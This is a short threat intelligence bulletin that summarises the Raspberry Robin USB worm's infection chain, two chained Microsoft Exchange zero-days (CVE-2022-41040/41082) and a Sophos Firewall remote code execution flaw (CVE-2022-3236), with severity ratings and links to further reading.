Threat Intelligence Update

Read the latest #SecurityGuidance from our Threat Intelligence team.??

Raspberry Robin worm

Overview

Severity level: High – Exploitation may result in command and control (C2) compromise, and loss of sensitive data. Compromise requires physical connection.

A relatively new malware, Russian associated Raspberry Robin was first observed back in September 2021 and has since been used in a growing number of attacks. The worm is spread by either?social engineered baiting?or via infected external drives, and uses Windows Installer to communicate with compromised QNAP-associated domains to download and install malicious DLL files to the infected device.

The payload behaviour follows five distinct steps:

1. Infected external device attached to victim’s computer
2. Cmd.exe reads and executes malicious file then launches msiexec.exe that reaches out to malicious URL
3. Malicious DLL installed from the previously connected URL
4. Rundll32.exe launches legitimate Windows utility to execute malicious DLL
5. Outbound connections attempted, usually to TOR networks.

Read more here.

Microsoft Exchange zero-day under active exploitation

Overview

Severity level: Critical – Two chained exploits with CVSS base scores of 8.8 and 6.3, exploitation could result in system compromise, data loss and lateral access to connected systems.

Vietnamese-based cyber security researchers GTSC have reportedly discovered two zero-day vulnerabilities that when chained together allow an attacker to perform remote code execution (RCE).

The vulnerabilities have been acknowledged by Microsoft and have been given the following CVEs:

CVE-2022-41040 – Server-Side Request Forgery (SSRF) vulnerability

CVE-2022-41082 – PowerShell RCE vulnerability

When used in unison, CVE-2022-41040 provides an authenticated attacker with the ability to remotely trigger CVE-2022-41082 and thus granting them access to the PowerShell scripts of the target system.

Read more on the Microsoft Exchange zero-day here.

Sophos remote code execution vulnerability under active exploitation

Overview

Severity level: Critical – base score 9.8 out of 10.

A remote code execution (RCE) vulnerability has been detected in the User Portal and Webadmin portal of Sophos Firewalls. This vulnerability is being tracked under?CVE-2022-3236.

CVE-2022-3236 has been added to the?CISA known exploited vulnerability catalogue.

Read more here.

For more updates, news and guidance visit our dedicated Threat Intelligence page.